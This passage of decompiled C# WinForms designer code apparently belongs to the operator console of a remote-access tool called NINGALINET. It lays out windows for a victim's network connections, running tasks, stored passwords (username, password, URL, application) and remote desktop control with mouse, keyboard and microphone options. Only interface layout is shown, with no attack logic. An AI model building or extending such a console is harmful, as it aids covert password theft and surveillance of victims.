     this.pr.TabIndex      = 2;
     this.pr.Text          = "ChProgressbar1";
     this.pr.Transparent   = true;
     this.pr.Value         = 1;
     this.LTCP.BackColor   = global::System.Drawing.Color.Black;
     this.LTCP.BorderStyle = global::System.Windows.Forms.BorderStyle.None;
     this.LTCP.Columns.AddRange(new global::System.Windows.Forms.ColumnHeader[]
     {
         this.ColumnHeader1,
         this.ColumnHeader2,
         this.ColumnHeader3,
         this.ColumnHeader4,
         this.ColumnHeader5,
         this.ColumnHeader6
     });
     this.LTCP.ContextMenuStrip = this.ContextMenuStrip1;
     this.LTCP.Dock             = global::System.Windows.Forms.DockStyle.Fill;
     this.LTCP.Font             = new global::System.Drawing.Font("Arial", 8f);
     this.LTCP.ForeColor        = global::System.Drawing.Color.WhiteSmoke;
     this.LTCP.FullRowSelect    = true;
     global::System.Windows.Forms.Control arg_469_0 = this.LTCP;
     location            = new global::System.Drawing.Point(0, 0);
     arg_469_0.Location  = location;
     this.LTCP.Name      = "LTCP";
     this.LTCP.OwnerDraw = true;
     global::System.Windows.Forms.Control arg_4A2_0 = this.LTCP;
     size               = new global::System.Drawing.Size(584, 325);
     arg_4A2_0.Size     = size;
     this.LTCP.TabIndex = 3;
     this.LTCP.UseCompatibleStateImageBehavior = false;
     this.LTCP.View           = global::System.Windows.Forms.View.Details;
     this.ColumnHeader1.Text  = "Local IP";
     this.ColumnHeader2.Text  = "Local Port";
     this.ColumnHeader3.Text  = "Remote IP";
     this.ColumnHeader4.Text  = "Remote Port";
     this.ColumnHeader5.Text  = "State";
     this.ColumnHeader6.Text  = "Process";
     this.ColumnHeader6.Width = 187;
     global::System.Drawing.SizeF autoScaleDimensions = new global::System.Drawing.SizeF(6f, 13f);
     this.AutoScaleDimensions = autoScaleDimensions;
     this.AutoScaleMode       = global::System.Windows.Forms.AutoScaleMode.Font;
     this.BackColor           = global::System.Drawing.Color.Black;
     size            = new global::System.Drawing.Size(584, 362);
     this.ClientSize = size;
     this.Controls.Add(this.LTCP);
     this.Controls.Add(this.pr);
     this.Controls.Add(this.StatusStrip1);
     this.Name          = "FrmConnections";
     this.ShowIcon      = false;
     this.StartPosition = global::System.Windows.Forms.FormStartPosition.CenterScreen;
     this.Text          = "Form3";
     this.StatusStrip1.ResumeLayout(false);
     this.StatusStrip1.PerformLayout();
     this.ContextMenuStrip1.ResumeLayout(false);
     this.ResumeLayout(false);
     this.PerformLayout();
 }
Exemple #6
0
 private void InitializeComponent()
 {
     this.components                  = new global::System.ComponentModel.Container();
     this.ContextMenuStrip2           = new global::System.Windows.Forms.ContextMenuStrip(this.components);
     this.StartToolStripMenuItem1     = new global::System.Windows.Forms.ToolStripMenuItem();
     this.AToolStripMenuItem          = new global::System.Windows.Forms.ToolStripSeparator();
     this.NewTaskRunToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
     this.SwitchToToolStripMenuItem   = new global::System.Windows.Forms.ToolStripMenuItem();
     this.MinimazeToolStripMenuItem   = new global::System.Windows.Forms.ToolStripMenuItem();
     this.MaximazeToolStripMenuItem   = new global::System.Windows.Forms.ToolStripMenuItem();
     this.EndTaskToolStripMenuItem    = new global::System.Windows.Forms.ToolStripMenuItem();
     this.StatusStrip1                = new global::System.Windows.Forms.StatusStrip();
     this.SL            = new global::System.Windows.Forms.ToolStripStatusLabel();
     this.L2            = new global::NINGALINET.LV();
     this.ColumnHeader1 = new global::System.Windows.Forms.ColumnHeader();
     this.ColumnHeader2 = new global::System.Windows.Forms.ColumnHeader();
     this.pr            = new global::NINGALINET.CHProgressbar();
     this.ContextMenuStrip2.SuspendLayout();
     this.StatusStrip1.SuspendLayout();
     this.SuspendLayout();
     this.ContextMenuStrip2.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.StartToolStripMenuItem1,
         this.AToolStripMenuItem,
         this.NewTaskRunToolStripMenuItem,
         this.SwitchToToolStripMenuItem,
         this.MinimazeToolStripMenuItem,
         this.MaximazeToolStripMenuItem,
         this.EndTaskToolStripMenuItem
     });
     this.ContextMenuStrip2.Name = "ContextMenuStrip2";
     global::System.Windows.Forms.Control arg_146_0 = this.ContextMenuStrip2;
     global::System.Drawing.Size          size      = new global::System.Drawing.Size(159, 142);
     arg_146_0.Size = size;
     this.StartToolStripMenuItem1.Name = "StartToolStripMenuItem1";
     global::System.Windows.Forms.ToolStripItem arg_170_0 = this.StartToolStripMenuItem1;
     size           = new global::System.Drawing.Size(158, 22);
     arg_170_0.Size = size;
     this.StartToolStripMenuItem1.Text = "Refresh";
     this.AToolStripMenuItem.Name      = "AToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_1A9_0 = this.AToolStripMenuItem;
     size           = new global::System.Drawing.Size(155, 6);
     arg_1A9_0.Size = size;
     this.NewTaskRunToolStripMenuItem.Name = "NewTaskRunToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_1D3_0 = this.NewTaskRunToolStripMenuItem;
     size           = new global::System.Drawing.Size(158, 22);
     arg_1D3_0.Size = size;
     this.NewTaskRunToolStripMenuItem.Text = "New Task Run...";
     this.SwitchToToolStripMenuItem.Name   = "SwitchToToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_20D_0 = this.SwitchToToolStripMenuItem;
     size           = new global::System.Drawing.Size(158, 22);
     arg_20D_0.Size = size;
     this.SwitchToToolStripMenuItem.Text = "Switch To";
     this.MinimazeToolStripMenuItem.Name = "MinimazeToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_247_0 = this.MinimazeToolStripMenuItem;
     size           = new global::System.Drawing.Size(158, 22);
     arg_247_0.Size = size;
     this.MinimazeToolStripMenuItem.Text = "Minimaze";
     this.MaximazeToolStripMenuItem.Name = "MaximazeToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_281_0 = this.MaximazeToolStripMenuItem;
     size           = new global::System.Drawing.Size(158, 22);
     arg_281_0.Size = size;
     this.MaximazeToolStripMenuItem.Text = "Maximaze";
     this.EndTaskToolStripMenuItem.Name  = "EndTaskToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_2BB_0 = this.EndTaskToolStripMenuItem;
     size           = new global::System.Drawing.Size(158, 22);
     arg_2BB_0.Size = size;
     this.EndTaskToolStripMenuItem.Text = "End Task";
     this.StatusStrip1.BackColor        = global::System.Drawing.Color.Black;
     this.StatusStrip1.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.SL
     });
     global::System.Windows.Forms.Control arg_315_0 = this.StatusStrip1;
     global::System.Drawing.Point         location  = new global::System.Drawing.Point(0, 340);
     arg_315_0.Location     = location;
     this.StatusStrip1.Name = "StatusStrip1";
     global::System.Windows.Forms.Control arg_33F_0 = this.StatusStrip1;
     size           = new global::System.Drawing.Size(584, 22);
     arg_33F_0.Size = size;
     this.StatusStrip1.SizingGrip = false;
     this.StatusStrip1.TabIndex   = 29;
     this.StatusStrip1.Text       = "StatusStrip1";
     this.SL.Name = "SL";
     global::System.Windows.Forms.ToolStripItem arg_38F_0 = this.SL;
     size                = new global::System.Drawing.Size(13, 17);
     arg_38F_0.Size      = size;
     this.SL.Text        = "..";
     this.L2.BackColor   = global::System.Drawing.Color.Black;
     this.L2.BorderStyle = global::System.Windows.Forms.BorderStyle.None;
     this.L2.Columns.AddRange(new global::System.Windows.Forms.ColumnHeader[]
     {
         this.ColumnHeader1,
         this.ColumnHeader2
     });
     this.L2.ContextMenuStrip = this.ContextMenuStrip2;
     this.L2.Dock             = global::System.Windows.Forms.DockStyle.Fill;
     this.L2.Font             = new global::System.Drawing.Font("Arial", 8f);
     this.L2.ForeColor        = global::System.Drawing.Color.WhiteSmoke;
     this.L2.FullRowSelect    = true;
     global::System.Windows.Forms.Control arg_44D_0 = this.L2;
     location           = new global::System.Drawing.Point(0, 0);
     arg_44D_0.Location = location;
     this.L2.Name       = "L2";
     this.L2.OwnerDraw  = true;
     global::System.Windows.Forms.Control arg_486_0 = this.L2;
     size             = new global::System.Drawing.Size(584, 325);
     arg_486_0.Size   = size;
     this.L2.TabIndex = 31;
     this.L2.UseCompatibleStateImageBehavior = false;
     this.L2.View             = global::System.Windows.Forms.View.Details;
     this.ColumnHeader1.Text  = "Task";
     this.ColumnHeader1.Width = 287;
     this.ColumnHeader2.Text  = "Status";
     this.ColumnHeader2.Width = 363;
     this.pr.BackColor        = global::System.Drawing.Color.Transparent;
     this.pr.Colors           = new global::NINGALINET.Bloom[0];
     this.pr.Customization    = global::NINGALINET.My.Resources.Resources.notf;
     this.pr.Dock             = global::System.Windows.Forms.DockStyle.Bottom;
     this.pr.Font             = new global::System.Drawing.Font("Verdana", 8f);
     this.pr.Image            = null;
     global::System.Windows.Forms.Control arg_567_0 = this.pr;
     location           = new global::System.Drawing.Point(0, 325);
     arg_567_0.Location = location;
     this.pr.Maximum    = 100;
     this.pr.Name       = "pr";
     this.pr.NoRounding = false;
     global::System.Windows.Forms.Control arg_5AA_0 = this.pr;
     size                = new global::System.Drawing.Size(584, 15);
     arg_5AA_0.Size      = size;
     this.pr.TabIndex    = 30;
     this.pr.Text        = "ChProgressbar1";
     this.pr.Transparent = true;
     this.pr.Value       = 0;
     global::System.Drawing.SizeF autoScaleDimensions = new global::System.Drawing.SizeF(6f, 13f);
     this.AutoScaleDimensions = autoScaleDimensions;
     this.AutoScaleMode       = global::System.Windows.Forms.AutoScaleMode.Font;
     this.BackColor           = global::System.Drawing.Color.Black;
     size            = new global::System.Drawing.Size(584, 362);
     this.ClientSize = size;
     this.Controls.Add(this.L2);
     this.Controls.Add(this.pr);
     this.Controls.Add(this.StatusStrip1);
     this.ForeColor     = global::System.Drawing.Color.WhiteSmoke;
     this.Name          = "FrmWinList";
     this.ShowIcon      = false;
     this.StartPosition = global::System.Windows.Forms.FormStartPosition.CenterScreen;
     this.Text          = "FrmWinList";
     this.ContextMenuStrip2.ResumeLayout(false);
     this.StatusStrip1.ResumeLayout(false);
     this.StatusStrip1.PerformLayout();
     this.ResumeLayout(false);
     this.PerformLayout();
 }
 private void InitializeComponent()
 {
     this.components = new global::System.ComponentModel.Container();
     global::System.ComponentModel.ComponentResourceManager componentResourceManager = new global::System.ComponentModel.ComponentResourceManager(typeof(global::NINGALINET.FrmStoredPassword));
     this.L1                            = new global::NINGALINET.LV();
     this.ColumnHeader1                 = new global::System.Windows.Forms.ColumnHeader();
     this.ColumnHeader2                 = new global::System.Windows.Forms.ColumnHeader();
     this.ColumnHeader3                 = new global::System.Windows.Forms.ColumnHeader();
     this.ColumnHeader4                 = new global::System.Windows.Forms.ColumnHeader();
     this.ContextMenuStrip1             = new global::System.Windows.Forms.ContextMenuStrip(this.components);
     this.RefreshToolStripMenuItem      = new global::System.Windows.Forms.ToolStripMenuItem();
     this.AToolStripMenuItem            = new global::System.Windows.Forms.ToolStripSeparator();
     this.SaveAsToolStripMenuItem       = new global::System.Windows.Forms.ToolStripMenuItem();
     this.CopyUsernameToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
     this.CopyPasswordToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
     this.CopyUrlToolStripMenuItem      = new global::System.Windows.Forms.ToolStripMenuItem();
     this.ImageList1                    = new global::System.Windows.Forms.ImageList(this.components);
     this.pr                            = new global::NINGALINET.CHProgressbar();
     this.StatusStrip1                  = new global::System.Windows.Forms.StatusStrip();
     this.SL                            = new global::System.Windows.Forms.ToolStripStatusLabel();
     this.ContextMenuStrip1.SuspendLayout();
     this.StatusStrip1.SuspendLayout();
     this.SuspendLayout();
     this.L1.BackColor   = global::System.Drawing.Color.Black;
     this.L1.BorderStyle = global::System.Windows.Forms.BorderStyle.None;
     this.L1.Columns.AddRange(new global::System.Windows.Forms.ColumnHeader[]
     {
         this.ColumnHeader1,
         this.ColumnHeader2,
         this.ColumnHeader3,
         this.ColumnHeader4
     });
     this.L1.ContextMenuStrip = this.ContextMenuStrip1;
     this.L1.Dock             = global::System.Windows.Forms.DockStyle.Fill;
     this.L1.Font             = new global::System.Drawing.Font("Arial", 8f);
     this.L1.ForeColor        = global::System.Drawing.Color.WhiteSmoke;
     this.L1.FullRowSelect    = true;
     this.L1.LargeImageList   = this.ImageList1;
     global::System.Windows.Forms.Control arg_1BF_0 = this.L1;
     global::System.Drawing.Point         location  = new global::System.Drawing.Point(0, 0);
     arg_1BF_0.Location = location;
     this.L1.Name       = "L1";
     this.L1.OwnerDraw  = true;
     global::System.Windows.Forms.Control arg_1F8_0 = this.L1;
     global::System.Drawing.Size          size      = new global::System.Drawing.Size(584, 325);
     arg_1F8_0.Size         = size;
     this.L1.SmallImageList = this.ImageList1;
     this.L1.TabIndex       = 29;
     this.L1.UseCompatibleStateImageBehavior = false;
     this.L1.View             = global::System.Windows.Forms.View.Details;
     this.ColumnHeader1.Text  = "Email/Username";
     this.ColumnHeader2.Text  = "Password(s)";
     this.ColumnHeader2.Width = 98;
     this.ColumnHeader3.Text  = "Url";
     this.ColumnHeader4.Text  = "Application";
     this.ContextMenuStrip1.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.RefreshToolStripMenuItem,
         this.AToolStripMenuItem,
         this.SaveAsToolStripMenuItem,
         this.CopyUsernameToolStripMenuItem,
         this.CopyPasswordToolStripMenuItem,
         this.CopyUrlToolStripMenuItem
     });
     this.ContextMenuStrip1.Name = "ContextMenuStrip1";
     global::System.Windows.Forms.Control arg_2FE_0 = this.ContextMenuStrip1;
     size           = new global::System.Drawing.Size(159, 142);
     arg_2FE_0.Size = size;
     this.RefreshToolStripMenuItem.Name = "RefreshToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_328_0 = this.RefreshToolStripMenuItem;
     size           = new global::System.Drawing.Size(158, 22);
     arg_328_0.Size = size;
     this.RefreshToolStripMenuItem.Text = "Refresh";
     this.AToolStripMenuItem.Name       = "AToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_361_0 = this.AToolStripMenuItem;
     size           = new global::System.Drawing.Size(155, 6);
     arg_361_0.Size = size;
     this.SaveAsToolStripMenuItem.Name = "SaveAsToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_38B_0 = this.SaveAsToolStripMenuItem;
     size           = new global::System.Drawing.Size(158, 22);
     arg_38B_0.Size = size;
     this.SaveAsToolStripMenuItem.Text       = "Save As";
     this.CopyUsernameToolStripMenuItem.Name = "CopyUsernameToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_3C5_0 = this.CopyUsernameToolStripMenuItem;
     size           = new global::System.Drawing.Size(158, 22);
     arg_3C5_0.Size = size;
     this.CopyUsernameToolStripMenuItem.Text = "Copy Username";
     this.CopyPasswordToolStripMenuItem.Name = "CopyPasswordToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_3FF_0 = this.CopyPasswordToolStripMenuItem;
     size           = new global::System.Drawing.Size(158, 22);
     arg_3FF_0.Size = size;
     this.CopyPasswordToolStripMenuItem.Text = "Copy Password";
     this.CopyUrlToolStripMenuItem.Name      = "CopyUrlToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_439_0 = this.CopyUrlToolStripMenuItem;
     size           = new global::System.Drawing.Size(158, 22);
     arg_439_0.Size = size;
     this.CopyUrlToolStripMenuItem.Text = "Copy Url";
     this.ImageList1.ImageStream        = (global::System.Windows.Forms.ImageListStreamer)componentResourceManager.GetObject("ImageList1.ImageStream");
     this.ImageList1.TransparentColor   = global::System.Drawing.Color.Transparent;
     this.ImageList1.Images.SetKeyName(0, "1.bmp");
     this.ImageList1.Images.SetKeyName(1, "2.bmp");
     this.ImageList1.Images.SetKeyName(2, "3.bmp");
     this.ImageList1.Images.SetKeyName(3, "4.bmp");
     this.ImageList1.Images.SetKeyName(4, "111.png");
     this.ImageList1.Images.SetKeyName(5, "115.png");
     this.ImageList1.Images.SetKeyName(6, "7.bmp");
     this.ImageList1.Images.SetKeyName(7, "8.bmp");
     this.ImageList1.Images.SetKeyName(8, "107.png");
     this.ImageList1.Images.SetKeyName(9, "116.png");
     this.ImageList1.Images.SetKeyName(10, "11.bmp");
     this.ImageList1.Images.SetKeyName(11, "12.bmp");
     this.ImageList1.Images.SetKeyName(12, "13.bmp");
     this.ImageList1.Images.SetKeyName(13, "Icon_1.ico");
     this.ImageList1.Images.SetKeyName(14, "PasswordRecoveryToolStripMenuItem.Image.png");
     this.pr.BackColor     = global::System.Drawing.Color.Transparent;
     this.pr.Colors        = new global::NINGALINET.Bloom[0];
     this.pr.Customization = global::NINGALINET.My.Resources.Resources.notf;
     this.pr.Dock          = global::System.Windows.Forms.DockStyle.Bottom;
     this.pr.Font          = new global::System.Drawing.Font("Verdana", 8f);
     this.pr.Image         = null;
     global::System.Windows.Forms.Control arg_640_0 = this.pr;
     location           = new global::System.Drawing.Point(0, 325);
     arg_640_0.Location = location;
     this.pr.Maximum    = 100;
     this.pr.Name       = "pr";
     this.pr.NoRounding = false;
     global::System.Windows.Forms.Control arg_683_0 = this.pr;
     size                        = new global::System.Drawing.Size(584, 15);
     arg_683_0.Size              = size;
     this.pr.TabIndex            = 28;
     this.pr.Text                = "ChProgressbar1";
     this.pr.Transparent         = true;
     this.pr.Value               = 0;
     this.StatusStrip1.BackColor = global::System.Drawing.Color.Black;
     this.StatusStrip1.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.SL
     });
     global::System.Windows.Forms.Control arg_705_0 = this.StatusStrip1;
     location               = new global::System.Drawing.Point(0, 340);
     arg_705_0.Location     = location;
     this.StatusStrip1.Name = "StatusStrip1";
     global::System.Windows.Forms.Control arg_72F_0 = this.StatusStrip1;
     size           = new global::System.Drawing.Size(584, 22);
     arg_72F_0.Size = size;
     this.StatusStrip1.SizingGrip = false;
     this.StatusStrip1.TabIndex   = 27;
     this.StatusStrip1.Text       = "StatusStrip1";
     this.SL.ForeColor            = global::System.Drawing.Color.WhiteSmoke;
     this.SL.Name = "SL";
     global::System.Windows.Forms.ToolStripItem arg_78F_0 = this.SL;
     size           = new global::System.Drawing.Size(13, 17);
     arg_78F_0.Size = size;
     this.SL.Text   = "..";
     global::System.Drawing.SizeF autoScaleDimensions = new global::System.Drawing.SizeF(6f, 13f);
     this.AutoScaleDimensions = autoScaleDimensions;
     this.AutoScaleMode       = global::System.Windows.Forms.AutoScaleMode.Font;
     this.BackColor           = global::System.Drawing.Color.Black;
     size            = new global::System.Drawing.Size(584, 362);
     this.ClientSize = size;
     this.Controls.Add(this.L1);
     this.Controls.Add(this.pr);
     this.Controls.Add(this.StatusStrip1);
     this.ForeColor     = global::System.Drawing.Color.WhiteSmoke;
     this.Name          = "FrmStoredPassword";
     this.ShowIcon      = false;
     this.StartPosition = global::System.Windows.Forms.FormStartPosition.CenterScreen;
     this.Text          = "StoredPassword";
     this.ContextMenuStrip1.ResumeLayout(false);
     this.StatusStrip1.ResumeLayout(false);
     this.StatusStrip1.PerformLayout();
     this.ResumeLayout(false);
     this.PerformLayout();
 }
        private void InitializeComponent()
        {
            this.components = new global::System.ComponentModel.Container();
            global::System.ComponentModel.ComponentResourceManager componentResourceManager = new global::System.ComponentModel.ComponentResourceManager(typeof(global::NINGALINET.FDesktop));
            this.C2                             = new global::System.Windows.Forms.ComboBox();
            this.Label2                         = new global::System.Windows.Forms.Label();
            this.Label3                         = new global::System.Windows.Forms.Label();
            this.CheckBox1                      = new global::System.Windows.Forms.CheckBox();
            this.C                              = new global::System.Windows.Forms.NumericUpDown();
            this.C1                             = new global::System.Windows.Forms.ComboBox();
            this.ImageList1                     = new global::System.Windows.Forms.ImageList(this.components);
            this.CheckBox3                      = new global::System.Windows.Forms.CheckBox();
            this.CheckBox2                      = new global::System.Windows.Forms.CheckBox();
            this.Timer1                         = new global::System.Windows.Forms.Timer(this.components);
            this.Button1                        = new global::System.Windows.Forms.Button();
            this.Label1                         = new global::System.Windows.Forms.Label();
            this.Button2                        = new global::System.Windows.Forms.Button();
            this.P1                             = new global::System.Windows.Forms.PictureBox();
            this.ContextMenuStrip1              = new global::System.Windows.Forms.ContextMenuStrip(this.components);
            this.SaveAsImageToolStripMenuItem   = new global::System.Windows.Forms.ToolStripMenuItem();
            this.ScreenOptionsToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
            this.CheckBox4                      = new global::System.Windows.Forms.CheckBox();
            this.Panel1                         = new global::System.Windows.Forms.Panel();
            this.Panel2                         = new global::System.Windows.Forms.Panel();
            this.TextBox1                       = new global::System.Windows.Forms.TextBox();
            this.Timer2                         = new global::System.Windows.Forms.Timer(this.components);
            ((global::System.ComponentModel.ISupportInitialize) this.C).BeginInit();
            ((global::System.ComponentModel.ISupportInitialize) this.P1).BeginInit();
            this.ContextMenuStrip1.SuspendLayout();
            this.Panel1.SuspendLayout();
            this.Panel2.SuspendLayout();
            this.SuspendLayout();
            this.C2.BackColor         = global::System.Drawing.Color.FromArgb(40, 40, 40);
            this.C2.DropDownStyle     = global::System.Windows.Forms.ComboBoxStyle.DropDownList;
            this.C2.FlatStyle         = global::System.Windows.Forms.FlatStyle.Popup;
            this.C2.ForeColor         = global::System.Drawing.Color.WhiteSmoke;
            this.C2.FormattingEnabled = true;
            global::System.Windows.Forms.Control arg_1C1_0 = this.C2;
            global::System.Drawing.Point         location  = new global::System.Drawing.Point(438, 24);
            arg_1C1_0.Location = location;
            this.C2.Name       = "C2";
            global::System.Windows.Forms.Control arg_1E8_0 = this.C2;
            global::System.Drawing.Size          size      = new global::System.Drawing.Size(84, 22);
            arg_1E8_0.Size       = size;
            this.C2.TabIndex     = 3;
            this.Label2.AutoSize = true;
            global::System.Windows.Forms.Control arg_21A_0 = this.Label2;
            location           = new global::System.Drawing.Point(434, 9);
            arg_21A_0.Location = location;
            this.Label2.Name   = "Label2";
            global::System.Windows.Forms.Control arg_241_0 = this.Label2;
            size                 = new global::System.Drawing.Size(30, 14);
            arg_241_0.Size       = size;
            this.Label2.TabIndex = 2;
            this.Label2.Text     = "Split:";
            this.Label3.AutoSize = true;
            global::System.Windows.Forms.Control arg_283_0 = this.Label3;
            location           = new global::System.Drawing.Point(344, 9);
            arg_283_0.Location = location;
            this.Label3.Name   = "Label3";
            global::System.Windows.Forms.Control arg_2AA_0 = this.Label3;
            size                    = new global::System.Drawing.Size(43, 14);
            arg_2AA_0.Size          = size;
            this.Label3.TabIndex    = 4;
            this.Label3.Text        = "Quality:";
            this.CheckBox1.AutoSize = true;
            global::System.Windows.Forms.Control arg_2EC_0 = this.CheckBox1;
            location            = new global::System.Drawing.Point(168, 28);
            arg_2EC_0.Location  = location;
            this.CheckBox1.Name = "CheckBox1";
            global::System.Windows.Forms.Control arg_313_0 = this.CheckBox1;
            size                    = new global::System.Drawing.Size(84, 18);
            arg_313_0.Size          = size;
            this.CheckBox1.TabIndex = 6;
            this.CheckBox1.Text     = "Show Lines";
            this.CheckBox1.UseVisualStyleBackColor = true;
            this.C.BackColor = global::System.Drawing.Color.FromArgb(40, 40, 40);
            this.C.ForeColor = global::System.Drawing.Color.WhiteSmoke;
            global::System.Windows.Forms.Control arg_37B_0 = this.C;
            location           = new global::System.Drawing.Point(348, 26);
            arg_37B_0.Location = location;
            global::System.Windows.Forms.NumericUpDown arg_3AD_0 = this.C;
            decimal num = new decimal(new int[]
            {
                20,
                0,
                0,
                0
            });

            arg_3AD_0.Minimum = num;
            this.C.Name       = "C";
            global::System.Windows.Forms.Control arg_3D4_0 = this.C;
            size            = new global::System.Drawing.Size(84, 20);
            arg_3D4_0.Size  = size;
            this.C.TabIndex = 9;
            global::System.Windows.Forms.NumericUpDown arg_413_0 = this.C;
            num = new decimal(new int[]
            {
                50,
                0,
                0,
                0
            });
            arg_413_0.Value           = num;
            this.C1.BackColor         = global::System.Drawing.Color.FromArgb(40, 40, 40);
            this.C1.DropDownStyle     = global::System.Windows.Forms.ComboBoxStyle.DropDownList;
            this.C1.FlatStyle         = global::System.Windows.Forms.FlatStyle.Popup;
            this.C1.ForeColor         = global::System.Drawing.Color.WhiteSmoke;
            this.C1.FormattingEnabled = true;
            global::System.Windows.Forms.Control arg_477_0 = this.C1;
            location           = new global::System.Drawing.Point(258, 24);
            arg_477_0.Location = location;
            this.C1.Name       = "C1";
            global::System.Windows.Forms.Control arg_49E_0 = this.C1;
            size                             = new global::System.Drawing.Size(84, 22);
            arg_49E_0.Size                   = size;
            this.C1.TabIndex                 = 1;
            this.ImageList1.ImageStream      = (global::System.Windows.Forms.ImageListStreamer)componentResourceManager.GetObject("ImageList1.ImageStream");
            this.ImageList1.TransparentColor = global::System.Drawing.Color.Transparent;
            this.ImageList1.Images.SetKeyName(0, "016.png");
            this.ImageList1.Images.SetKeyName(1, "015.png");
            this.ImageList1.Images.SetKeyName(2, "microphone.png");
            this.CheckBox3.AutoSize  = true;
            this.CheckBox3.ForeColor = global::System.Drawing.Color.WhiteSmoke;
            global::System.Windows.Forms.Control arg_54A_0 = this.CheckBox3;
            location            = new global::System.Drawing.Point(88, 29);
            arg_54A_0.Location  = location;
            this.CheckBox3.Name = "CheckBox3";
            global::System.Windows.Forms.Control arg_571_0 = this.CheckBox3;
            size                    = new global::System.Drawing.Size(73, 18);
            arg_571_0.Size          = size;
            this.CheckBox3.TabIndex = 31;
            this.CheckBox3.Text     = "Keyboard";
            this.CheckBox3.UseVisualStyleBackColor = true;
            this.CheckBox2.AutoSize  = true;
            this.CheckBox2.ForeColor = global::System.Drawing.Color.WhiteSmoke;
            global::System.Windows.Forms.Control arg_5CC_0 = this.CheckBox2;
            location            = new global::System.Drawing.Point(88, 5);
            arg_5CC_0.Location  = location;
            this.CheckBox2.Name = "CheckBox2";
            global::System.Windows.Forms.Control arg_5F3_0 = this.CheckBox2;
            size                    = new global::System.Drawing.Size(58, 18);
            arg_5F3_0.Size          = size;
            this.CheckBox2.TabIndex = 10;
            this.CheckBox2.Text     = "Mouse";
            this.CheckBox2.UseVisualStyleBackColor = true;
            this.Timer1.Enabled    = true;
            this.Button1.BackColor = global::System.Drawing.Color.FromArgb(20, 20, 20);
            this.Button1.FlatStyle = global::System.Windows.Forms.FlatStyle.Popup;
            global::System.Windows.Forms.Control arg_65F_0 = this.Button1;
            location           = new global::System.Drawing.Point(7, 6);
            arg_65F_0.Location = location;
            this.Button1.Name  = "Button1";
            global::System.Windows.Forms.Control arg_686_0 = this.Button1;
            size                  = new global::System.Drawing.Size(75, 40);
            arg_686_0.Size        = size;
            this.Button1.TabIndex = 45;
            this.Button1.Text     = "Start";
            this.Button1.UseVisualStyleBackColor = false;
            this.Label1.AutoSize = true;
            global::System.Windows.Forms.Control arg_6D5_0 = this.Label1;
            location           = new global::System.Drawing.Point(254, 9);
            arg_6D5_0.Location = location;
            this.Label1.Name   = "Label1";
            global::System.Windows.Forms.Control arg_6FC_0 = this.Label1;
            size                   = new global::System.Drawing.Size(37, 14);
            arg_6FC_0.Size         = size;
            this.Label1.TabIndex   = 46;
            this.Label1.Text       = "Size : ";
            this.Button2.BackColor = global::System.Drawing.Color.FromArgb(20, 20, 20);
            this.Button2.FlatStyle = global::System.Windows.Forms.FlatStyle.Popup;
            global::System.Windows.Forms.Control arg_758_0 = this.Button2;
            location           = new global::System.Drawing.Point(634, 239);
            arg_758_0.Location = location;
            this.Button2.Name  = "Button2";
            global::System.Windows.Forms.Control arg_77F_0 = this.Button2;
            size                  = new global::System.Drawing.Size(75, 25);
            arg_77F_0.Size        = size;
            this.Button2.TabIndex = 47;
            this.Button2.Text     = "Save";
            this.Button2.UseVisualStyleBackColor = false;
            this.P1.BackColor = global::System.Drawing.Color.Black;
            this.P1.Dock      = global::System.Windows.Forms.DockStyle.Fill;
            global::System.Windows.Forms.Control arg_7D9_0 = this.P1;
            location           = new global::System.Drawing.Point(0, 0);
            arg_7D9_0.Location = location;
            this.P1.Name       = "P1";
            global::System.Windows.Forms.Control arg_806_0 = this.P1;
            size             = new global::System.Drawing.Size(610, 379);
            arg_806_0.Size   = size;
            this.P1.SizeMode = global::System.Windows.Forms.PictureBoxSizeMode.StretchImage;
            this.P1.TabIndex = 49;
            this.P1.TabStop  = false;
            this.ContextMenuStrip1.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
            {
                this.SaveAsImageToolStripMenuItem,
                this.ScreenOptionsToolStripMenuItem
            });
            this.ContextMenuStrip1.Name = "ContextMenuStrip1";
            global::System.Windows.Forms.Control arg_883_0 = this.ContextMenuStrip1;
            size           = new global::System.Drawing.Size(155, 48);
            arg_883_0.Size = size;
            this.SaveAsImageToolStripMenuItem.Name = "SaveAsImageToolStripMenuItem";
            global::System.Windows.Forms.ToolStripItem arg_8AD_0 = this.SaveAsImageToolStripMenuItem;
            size           = new global::System.Drawing.Size(154, 22);
            arg_8AD_0.Size = size;
            this.SaveAsImageToolStripMenuItem.Text   = "Save As";
            this.ScreenOptionsToolStripMenuItem.Name = "ScreenOptionsToolStripMenuItem";
            global::System.Windows.Forms.ToolStripItem arg_8E7_0 = this.ScreenOptionsToolStripMenuItem;
            size           = new global::System.Drawing.Size(154, 22);
            arg_8E7_0.Size = size;
            this.ScreenOptionsToolStripMenuItem.Text = "Screen Options";
            this.CheckBox4.AutoSize = true;
            global::System.Windows.Forms.Control arg_91C_0 = this.CheckBox4;
            location            = new global::System.Drawing.Point(168, 6);
            arg_91C_0.Location  = location;
            this.CheckBox4.Name = "CheckBox4";
            global::System.Windows.Forms.Control arg_943_0 = this.CheckBox4;
            size                    = new global::System.Drawing.Size(77, 18);
            arg_943_0.Size          = size;
            this.CheckBox4.TabIndex = 47;
            this.CheckBox4.Text     = "Auto Save";
            this.CheckBox4.UseVisualStyleBackColor = true;
